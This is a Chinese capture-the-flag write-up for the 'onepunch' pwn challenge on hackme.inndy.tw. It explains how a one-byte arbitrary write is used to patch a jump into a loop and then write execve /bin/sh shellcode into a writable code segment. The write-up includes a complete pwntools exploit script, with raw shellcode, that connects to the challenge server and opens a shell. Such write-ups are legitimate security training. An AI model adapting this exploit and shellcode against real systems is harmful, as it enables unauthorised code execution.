onepunch的wp

https://hackme.inndy.tw/scoreboard/ 题目很有趣，我做了onepunch这个题目感觉还不错，我把wp分享出来，方便大家学习
onepunch的题目要求是：

nc hackme.inndy.tw 7718Punch!

这个题目没有太多提示
下面我用ida打开smashthestack这个程序看main函数

这个程序在16行有一个任意地址写的漏洞，程序输入的第一个数字是写入的地址，第二个数字是写入的数，但是这个程序只能写一个字节的数据到指定地址
先运行一下程序看一下这个程序干了啥

再看看程序开启了哪些保护：

看到NX enabled是开启了栈不可执行，而且这个程序还有canary保护，但是这个程序没有开启地址随机化
用gdb加载一下这个程序

用vmmap这个指令可以看到代码段可读写，这个题目一下子就简单了，通过任意地址的写，把shellcode写入内存中，然后执行起来，先看一下汇编代码

可以看到在任意地址写这个漏洞之后有个条件跳转（0000000000400767），可以控制这个跳转向上跳转到输入的地方（000000000040072C）从而使这段代码变成一个循环，可以看一下jz short loc_400756对应的字节码是75 0a,75是jnz，0a是跳转的偏移，所以就刚刚好通过第一次写操作把这个0a改掉，所以程序开始时输入400768 -61就可以让这个程序变成一个循环了

这样通过这个循环把0000000000400769后面的代码变成shellcode就可以了，关于shellcode，里面不能出现255，如果有255的话，shellcode就会被程序截断，我找了半天，找到一个好用的shellcode：https://www.exploit-db.com/exploits/36858/
这样就可以实现exp了：

#-*- coding: utf-8 -*-__Auther__ = 'niexinming'from pwn import *import binasciiimport timecontext(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'amd64', os = 'linux', log_level = 'debug')def debug(addr = '0x000000000040075d'):    raw_input('debug:')    gdb.attach(io, "b *" + addr)elf = ELF('/home/h11p/hackme/onepunch')stack_chk_fail=elf.got['__stack_chk_fail']print "%x" % stack_chk_fail#shellcode=asm(shellcraft.amd64.linux.sh())#str_shellcode=str(binascii.b2a_hex(shellcode))#https://www.exploit-db.com/exploits/36858/shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"addr=0x0400769#io = process('/home/h11p/hackme/onepunch')io = remote('hackme.inndy.tw', 7718)payload1 = '400768'payload2 = '-61'#debug()time.sleep(1)io.recvuntil('Where What?')io.sendline(payload1)io.sendline(payload2)'''for i in xrange(0,len(str_shellcode),2):    io.sendline(hex(addr))    io.sendline(str(int(str_shellcode[i:i+2],16)))    addr=addr+0x1'''for i in shellcode:    io.sendline(hex(addr))    io.sendline(str(ord(i)))    addr = addr + 0x1io.sendline('4006f3')io.sendline(str(255))#io.recv()io.interactive()io.close()

效果是：